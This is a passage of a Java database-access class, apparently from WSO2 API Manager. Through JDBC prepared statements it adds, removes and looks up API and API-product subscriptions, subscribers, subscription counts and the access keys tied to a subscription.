subscriber.setTenantId(rs.getInt("TENANT_ID")); subscriber.setEmail(rs.getString("EMAIL_ADDRESS")); subscriber.setSubscribedDate(new java.util.Date(rs.getTimestamp("DATE_SUBSCRIBED").getTime())); return subscriber; } } catch (SQLException e) { handleException("Error while retrieving subscriber: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return null; } public int addSubscription(APIIdentifier identifier, String context, int applicationId, String status, String subscriber) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement preparedStForInsert = null; ResultSet rs = null; int subscriptionId = -1; int apiId; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); apiId = getAPIID(identifier, conn); //Query to check if this subscription already exists String checkDuplicateQuery = SQLConstants.CHECK_EXISTING_SUBSCRIPTION_API_SQL; ps = conn.prepareStatement(checkDuplicateQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); resultSet = ps.executeQuery(); //If the subscription already exists if (resultSet.next()) { String subStatus = resultSet.getString("SUB_STATUS"); String subCreationStatus = resultSet.getString("SUBS_CREATE_STATE"); String applicationName = getApplicationNameFromId(applicationId); if ((APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus.ON_HOLD.equals(subStatus) || APIConstants.SubscriptionStatus.REJECTED.equals(subStatus)) && APIConstants.SubscriptionCreatedStatus.SUBSCRIBE.equals(subCreationStatus)) { //Throw error saying subscription already exists. log.error("Subscription already exists for API " + identifier.getApiName() + " in Application " + applicationName); throw new SubscriptionAlreadyExistingException("Subscription already exists for API " + identifier.getApiName() + " in Application " + applicationName); } else if (APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) && APIConstants .SubscriptionCreatedStatus.UN_SUBSCRIBE.equals(subCreationStatus)) { deleteSubscriptionByApiIDAndAppID(apiId, applicationId, conn); } else if (APIConstants.SubscriptionStatus.BLOCKED.equals(subStatus) || APIConstants .SubscriptionStatus.PROD_ONLY_BLOCKED.equals(subStatus)) { log.error("Subscription to API " + identifier.getApiName() + " through application " + applicationName + " was blocked"); throw new APIManagementException("Subscription to API " + identifier.getApiName() + " through " + "application " + applicationName + " was blocked"); } } //This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.ADD_SUBSCRIPTION_SQL; //Adding data to the AM_SUBSCRIPTION table //ps = conn.prepareStatement(sqlQuery, Statement.RETURN_GENERATED_KEYS); preparedStForInsert = conn.prepareStatement(sqlQuery, new String[]{"SUBSCRIPTION_ID"}); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { preparedStForInsert = conn.prepareStatement(sqlQuery, new String[]{"subscription_id"}); } preparedStForInsert.setString(1, identifier.getTier()); preparedStForInsert.setInt(2, apiId); preparedStForInsert.setInt(3, applicationId); preparedStForInsert.setString(4, status != null ? status : APIConstants.SubscriptionStatus.UNBLOCKED); preparedStForInsert.setString(5, APIConstants.SubscriptionCreatedStatus.SUBSCRIBE); preparedStForInsert.setString(6, subscriber); Timestamp timestamp = new Timestamp(System.currentTimeMillis()); preparedStForInsert.setTimestamp(7, timestamp); preparedStForInsert.setTimestamp(8, timestamp); preparedStForInsert.setString(9, UUID.randomUUID().toString()); preparedStForInsert.executeUpdate(); rs = preparedStForInsert.getGeneratedKeys(); while (rs.next()) { //subscriptionId = rs.getInt(1); subscriptionId = Integer.parseInt(rs.getString(1)); } // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(preparedStForInsert, null, rs); } return subscriptionId; } public int addSubscription(APIProductIdentifier identifier, int applicationId, String status, String subscriber) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement preparedStForInsert = null; ResultSet rs = null; int subscriptionId = -1; int apiProductId; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String productName = identifier.getApiProductName(); String provider = identifier.getProviderName(); apiProductId = getAPIProductID(productName, provider, conn); // Query to check if this subscription already exists String checkDuplicateQuery = SQLConstants.CHECK_EXISTING_SUBSCRIPTION_PRODUCT_SQL; ps = conn.prepareStatement(checkDuplicateQuery); ps.setInt(1, apiProductId); ps.setInt(2, applicationId); resultSet = ps.executeQuery(); // If the subscription already exists if (resultSet.next()) { String subStatus = resultSet.getString("SUB_STATUS"); String subCreationStatus = resultSet.getString("SUBS_CREATE_STATE"); String applicationName = getApplicationNameFromId(applicationId); if ((APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus.ON_HOLD.equals(subStatus) || APIConstants.SubscriptionStatus.REJECTED.equals(subStatus)) && APIConstants.SubscriptionCreatedStatus.SUBSCRIBE.equals(subCreationStatus)) { // Throw error saying subscription already exists. log.error("Subscription already exists for API Product " + productName + " in Application " + applicationName); throw new SubscriptionAlreadyExistingException("Subscription already exists for API Product " + productName + " in Application " + applicationName); } else if (APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) && APIConstants.SubscriptionCreatedStatus.UN_SUBSCRIBE.equals(subCreationStatus)) { deleteSubscriptionByApiProductIDAndAppID(apiProductId, applicationId, conn); } else if (APIConstants.SubscriptionStatus.BLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus.PROD_ONLY_BLOCKED.equals(subStatus)) { log.error("Subscription to API Product " + productName + " through application " + applicationName + " was blocked"); throw new APIManagementException("Subscription to API Product " + productName + " through " + "application " + applicationName + " was blocked"); } } // This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.ADD_PRODUCT_SUBSCRIPTION_SQL; // Adding data to the AM_SUBSCRIPTION table // ps = conn.prepareStatement(sqlQuery, Statement.RETURN_GENERATED_KEYS); preparedStForInsert = conn.prepareStatement(sqlQuery, new String[] { "SUBSCRIPTION_ID" }); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { preparedStForInsert = conn.prepareStatement(sqlQuery, new String[] { "subscription_id" }); } preparedStForInsert.setString(1, identifier.getTier()); preparedStForInsert.setInt(2, apiProductId); preparedStForInsert.setInt(3, applicationId); preparedStForInsert.setString(4, status != null ? status : APIConstants.SubscriptionStatus.UNBLOCKED); preparedStForInsert.setString(5, APIConstants.SubscriptionCreatedStatus.SUBSCRIBE); preparedStForInsert.setString(6, subscriber); Timestamp timestamp = new Timestamp(System.currentTimeMillis()); preparedStForInsert.setTimestamp(7, timestamp); preparedStForInsert.setTimestamp(8, timestamp); preparedStForInsert.setString(9, UUID.randomUUID().toString()); preparedStForInsert.executeUpdate(); rs = preparedStForInsert.getGeneratedKeys(); while (rs.next()) { // subscriptionId = rs.getInt(1); subscriptionId = Integer.parseInt(rs.getString(1)); } // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(preparedStForInsert, null, rs); } return subscriptionId; } /** * Removes the subscription entry from AM_SUBSCRIPTIONS for identifier. * * @param identifier APIIdentifier * @param applicationId ID of the application which has the subscription * @throws APIManagementException */ public void removeSubscription(APIIdentifier identifier, int applicationId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; int apiId = -1; String uuid; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); apiId = getAPIID(identifier, conn); String subscriptionUUIDQuery = SQLConstants.GET_SUBSCRIPTION_UUID_SQL; ps = conn.prepareStatement(subscriptionUUIDQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); resultSet = ps.executeQuery(); if (resultSet.next()) { uuid = resultSet.getString("UUID"); SubscribedAPI subscribedAPI = new SubscribedAPI(uuid); removeSubscription(subscribedAPI, conn); } else { throw new APIManagementException("UUID does not exist for the given apiId:" + apiId + " and " + "application id:" + applicationId); } conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { log.error("Failed to rollback the add subscription ", ex); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } } /** * Removes a subscription specified by SubscribedAPI object * * @param subscription SubscribedAPI object * @param conn database connection object * @throws APIManagementException */ public void removeSubscription(SubscribedAPI subscription, Connection conn) throws APIManagementException { ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement preparedStForUpdateOrDelete = null; String subStatus = null; try { String subscriptionStatusQuery = SQLConstants.GET_SUBSCRIPTION_STATUS_BY_UUID_SQL; ps = conn.prepareStatement(subscriptionStatusQuery); ps.setString(1, subscription.getUUID()); resultSet = ps.executeQuery(); if (resultSet.next()) { subStatus = resultSet.getString("SUB_STATUS"); } // If the user was unblocked, remove the entry from DB, else change the status and keep the entry. String updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_SQL; String deleteQuery = SQLConstants.REMOVE_SUBSCRIPTION_SQL; if (APIConstants.SubscriptionStatus.BLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus .PROD_ONLY_BLOCKED.equals(subStatus)) { preparedStForUpdateOrDelete = conn.prepareStatement(updateQuery); preparedStForUpdateOrDelete.setString(1, subscription.getUUID()); } else { preparedStForUpdateOrDelete = conn.prepareStatement(deleteQuery); preparedStForUpdateOrDelete.setString(1, subscription.getUUID()); } preparedStForUpdateOrDelete.executeUpdate(); } catch (SQLException e) { log.error("Failed to add subscriber data ", e); handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, resultSet); APIMgtDBUtil.closeAllConnections(preparedStForUpdateOrDelete, null, null); } } /** * Removes a subscription by id by force without considering the subscription blocking state of the user * * @param subscription_id id of subscription * @throws APIManagementException */ public void removeSubscriptionById(int subscription_id) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String sqlQuery = SQLConstants.REMOVE_SUBSCRIPTION_BY_ID_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, subscription_id); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback remove subscription ", e1); } } handleException("Failed to remove subscription data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public void removeAllSubscriptions(APIIdentifier apiIdentifier) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; int apiId; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); apiId = getAPIID(apiIdentifier, conn); String sqlQuery = SQLConstants.REMOVE_ALL_SUBSCRIPTIONS_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback remove all subscription ", e1); } } handleException("Failed to remove all subscriptions data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public String getSubscriptionStatusById(int subscriptionId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String subscriptionStatus = null; try { conn = APIMgtDBUtil.getConnection(); String getApiQuery = SQLConstants.GET_SUBSCRIPTION_STATUS_BY_ID_SQL; ps = conn.prepareStatement(getApiQuery); ps.setInt(1, subscriptionId); resultSet = ps.executeQuery(); if (resultSet.next()) { subscriptionStatus = resultSet.getString("SUB_STATUS"); } return subscriptionStatus; } catch (SQLException e) { handleException("Failed to retrieve subscription status", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * returns the SubscribedAPI object which is related to the subscriptionId * * @param subscriptionId subscription id * @return {@link SubscribedAPI} Object which contains the subscribed API information. * @throws APIManagementException */ public SubscribedAPI getSubscriptionById(int subscriptionId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String getSubscriptionQuery = SQLConstants.GET_SUBSCRIPTION_BY_ID_SQL; ps = conn.prepareStatement(getSubscriptionQuery); ps.setInt(1, subscriptionId); resultSet = ps.executeQuery(); SubscribedAPI subscribedAPI = null; if (resultSet.next()) { int applicationId = resultSet.getInt("APPLICATION_ID"); Application application = getApplicationById(applicationId); if(!StringUtils.isEmpty(resultSet.getString("API_NAME"))) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(resultSet.getString ("API_PROVIDER")), resultSet.getString("API_NAME"), resultSet.getString("API_VERSION")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiIdentifier); } if(!StringUtils.isEmpty(resultSet.getString("API_PRODUCT_NAME"))) { APIProductIdentifier apiProductIdentifier = new APIProductIdentifier( APIUtil.replaceEmailDomain(resultSet.getString("API_PRODUCT_PROVIDER")), resultSet.getString("API_PRODUCT_NAME")); apiProductIdentifier.setUuid(resultSet.getString("PRODUCT_UUID")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiProductIdentifier); } subscribedAPI.setSubscriptionId(resultSet.getInt("SUBSCRIPTION_ID")); subscribedAPI.setSubStatus(resultSet.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(resultSet.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(resultSet.getString("TIER_ID"))); subscribedAPI.setUUID(resultSet.getString("UUID")); subscribedAPI.setApplication(application); } return subscribedAPI; } catch (SQLException e) { handleException("Failed to retrieve subscription from subscription id", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * returns the SubscribedAPI object which is related to the UUID * * @param uuid UUID of Application * @return {@link SubscribedAPI} Object which contains the subscribed API information. * @throws APIManagementException */ public SubscribedAPI getSubscriptionByUUID(String uuid) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String getSubscriptionQuery = SQLConstants.GET_SUBSCRIPTION_BY_UUID_SQL; ps = conn.prepareStatement(getSubscriptionQuery); ps.setString(1, uuid); resultSet = ps.executeQuery(); SubscribedAPI subscribedAPI = null; if (resultSet.next()) { int applicationId = resultSet.getInt("APPLICATION_ID"); Application application = getApplicationById(applicationId); if(!StringUtils.isEmpty(resultSet.getString("API_NAME"))) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(resultSet.getString ("API_PROVIDER")), resultSet.getString("API_NAME"), resultSet.getString("API_VERSION")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiIdentifier); } if(!StringUtils.isEmpty(resultSet.getString("API_PRODUCT_NAME"))) { APIProductIdentifier apiProductIdentifier = new APIProductIdentifier( APIUtil.replaceEmailDomain(resultSet.getString("API_PRODUCT_PROVIDER")), resultSet.getString("API_PRODUCT_NAME")); apiProductIdentifier.setUuid(resultSet.getString("PRODUCT_UUID")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiProductIdentifier); } subscribedAPI.setUUID(resultSet.getString("UUID")); subscribedAPI.setSubscriptionId(resultSet.getInt("SUBSCRIPTION_ID")); subscribedAPI.setSubStatus(resultSet.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(resultSet.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(resultSet.getString("TIER_ID"))); Timestamp createdTime = resultSet.getTimestamp("CREATED_TIME"); subscribedAPI.setCreatedTime(createdTime == null ? null : String.valueOf(createdTime.getTime())); try { Timestamp updated_time = resultSet.getTimestamp("UPDATED_TIME"); subscribedAPI.setUpdatedTime( updated_time == null ? null : String.valueOf(updated_time.getTime())); } catch (SQLException e) { // fixing Timestamp issue with default value '0000-00-00 00:00:00'for existing applications created subscribedAPI.setUpdatedTime(subscribedAPI.getCreatedTime()); } subscribedAPI.setApplication(application); } return subscribedAPI; } catch (SQLException e) { handleException("Failed to retrieve subscription from subscription id", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * This method used tot get Subscriber from subscriberId. * * @param subscriberName id * @return Subscriber * @throws APIManagementException if failed to get Subscriber from subscriber id */ public Subscriber getSubscriber(String subscriberName) throws APIManagementException { Connection conn = null; Subscriber subscriber = null; PreparedStatement ps = null; ResultSet result = null; int tenantId = APIUtil.getTenantId(subscriberName); String sqlQuery = SQLConstants.GET_TENANT_SUBSCRIBER_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_TENANT_SUBSCRIBER_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, subscriberName); ps.setInt(2, tenantId); result = ps.executeQuery(); if (result.next()) { subscriber = new Subscriber(result.getString(APIConstants.SUBSCRIBER_FIELD_EMAIL_ADDRESS)); subscriber.setEmail(result.getString("EMAIL_ADDRESS")); subscriber.setId(result.getInt("SUBSCRIBER_ID")); subscriber.setName(subscriberName); subscriber.setSubscribedDate(result.getDate(APIConstants.SUBSCRIBER_FIELD_DATE_SUBSCRIBED)); subscriber.setTenantId(result.getInt("TENANT_ID")); } } catch (SQLException e) { handleException("Failed to get Subscriber for :" + subscriberName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, result); } return subscriber; } public Set<APIIdentifier> getAPIByConsumerKey(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String getAPISql = SQLConstants.GET_API_BY_CONSUMER_KEY_SQL; Set<APIIdentifier> apiSet = new HashSet<APIIdentifier>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getAPISql); String encryptedAccessToken = APIUtil.encryptToken(accessToken); ps.setString(1, encryptedAccessToken); result = ps.executeQuery(); while (result.next()) { apiSet.add(new APIIdentifier(result.getString("API_PROVIDER"), result.getString("API_NAME"), result .getString("API_VERSION"))); } } catch (SQLException e) { handleException("Failed to get API ID for token: " + accessToken, e); } catch (CryptoException e) { handleException("Failed to get API ID for token: " + accessToken, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiSet; } /** * This method returns the set of APIs for given subscriber, subscribed under the specified application. * * @param subscriber subscriber * @param applicationName Application Name * @return Set<API> * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get SubscribedAPIs */ public Set<SubscribedAPI> getSubscribedAPIs(Subscriber subscriber, String applicationName, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_SQL; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIdArr[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, applicationName); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubscriptionId(result.getInt("SUBS_ID")); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setUUID(result.getString("SUB_UUID")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); application.setUUID(result.getString("APP_UUID")); subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } /** * This method returns the set of APIs for given subscriber, subscribed under the specified application. * * @param subscriber subscriber * @param applicationId Application Id * @return Set<API> * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get SubscribedAPIs */ public Set<SubscribedAPI> getSubscribedAPIsByApplicationId(Subscriber subscriber, int applicationId, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_BY_ID_SQL; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIdArr[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setInt(2, applicationId); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubscriptionId(result.getInt("SUBS_ID")); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setUUID(result.getString("SUB_UUID")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); application.setId(result.getInt("APP_ID")); application.setOwner(result.getString("OWNER")); application.setCallbackUrl(result.getString("CALLBACK_URL")); application.setUUID(result.getString("APP_UUID")); if (multiGroupAppSharingEnabled) { application.setGroupId(getGroupId(application.getId())); } int subscriptionId = result.getInt("SUBS_ID"); Set<APIKey> apiKeys = getAPIKeysBySubscription(subscriptionId); for (APIKey key : apiKeys) { subscribedAPI.addKey(key); } subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } private Set<APIKey> getAPIKeysBySubscription(int subscriptionId) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String getKeysSql = SQLConstants.GET_API_KEY_BY_SUBSCRIPTION_SQL; Set<APIKey> apiKeys = new HashSet<APIKey>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getKeysSql); ps.setInt(1, subscriptionId); result = ps.executeQuery(); while (result.next()) { APIKey apiKey = new APIKey(); String decryptedAccessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); apiKey.setAccessToken(decryptedAccessToken); apiKey.setType(result.getString("TOKEN_TYPE")); apiKeys.add(apiKey); } } catch (SQLException e) { handleException("Failed to get API keys for subscription: " + subscriptionId, e); } catch (CryptoException e) { handleException("Failed to get API keys for subscription: " + subscriptionId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKeys; } public Integer getSubscriptionCount(Subscriber subscriber, String applicationName, String groupingId) throws APIManagementException { Integer subscriptionCount = 0; Connection connection = null; PreparedStatement ps = null; ResultSet result = null; int tenantId = APIUtil.getTenantId(subscriber.getName()); try { connection = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_CASE_INSENSITIVE_SQL; } String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR " + "((APP.GROUP_ID = '' OR APP.GROUP_ID IS NULL) AND SUB.USER_ID = ?)) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithUserId = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String appIdentifier; boolean hasGrouping = false; if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); sqlQuery += whereClauseWithMultiGroupId; String[] groupIdArr = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); ps.setString(1, applicationName); ps.setInt(2, tenantId); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { sqlQuery += whereClauseWithGroupId; ps = connection.prepareStatement(sqlQuery); ps.setString(1, applicationName); ps.setInt(2, tenantId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClauseWithUserId; } ps = connection.prepareStatement(sqlQuery); ps.setString(1, applicationName); ps.setInt(2, tenantId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { subscriptionCount = result.getInt("SUB_COUNT"); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptionCount; } public Integer getSubscriptionCountByApplicationId(Subscriber subscriber, int applicationId, String groupingId) throws APIManagementException { Integer subscriptionCount = 0; Connection connection = null; PreparedStatement ps = null; ResultSet result = null; 